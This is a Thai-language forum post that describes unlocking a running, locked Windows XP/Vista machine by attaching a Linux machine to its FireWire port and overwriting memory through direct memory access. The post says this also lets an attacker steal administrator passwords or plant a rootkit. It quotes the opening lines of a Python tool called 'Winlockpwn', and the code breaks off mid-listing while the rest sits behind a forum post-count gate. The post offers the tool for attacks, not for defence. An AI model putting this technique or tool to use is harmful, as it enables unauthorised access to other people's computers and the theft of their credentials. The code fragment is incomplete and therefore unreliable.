Hack เครื่อง Windows ที่เปิดอยู่และ Lock Screen ไวู้่็

[tonynuc]

เทคนิคการ hack เครื่อง windows ที่เปิดเครื่องอยู่และ lock screen ไวู้่ โดย attacker จะใช้เครื่อง linux เพื่อ connect เครื่องเหยือ ผ่าน Firewire port เพื่อ access ข้อมูลใน memory (ปกติ Firewire port จะแตกต่างจาก USB port ตรงที่สามารถ อ่านและเขียน memory โดยตรงได้โดยไม่ต้องผ่าน OS)



ต่อไป attacker ก็จะใช้ tool ในการ disable password protection ของ Windows ที่อยู่ใน memory ซึงทำให้ attacker สามารถขโมย password ของ administrator หรือฝัง rootkit ได้ด้วย

Tool ที่ใช้ในการ unlock Windows screen :
(Tested on Windows XP SP2 , Windows Vista)

[hide=30]
เป็น python ครับ

[code]
#!/usr/bin/python
# Windows locked screen remote firewire unlockor
# Metlstorm 2k6
# Uh, private use only, not for public distro, kthx.

import sys
import firewire
import binascii
import time

VER=1.5
VERSTR="Winlockpwn v%s Metlstorm, 2k6. <metlstorm@storm.net.nz>" % VER

# Targets are dicts, with some properties, and one or more phases
# each phase specifies a signature which can be found at one or more
# page offsets. When a signature is found the patch is applied at patchoffset
# bytes from the beginning of the signature.

targets=[{

[tonynuc]

อ่านรายละเอียดเพิ่มเติมเกี่ยวกับการ bypass password protection โดยการ overwrite memory ผ่าน firewire port

**Hidden Content: To see this hidden content your post count must be 20 or greater.**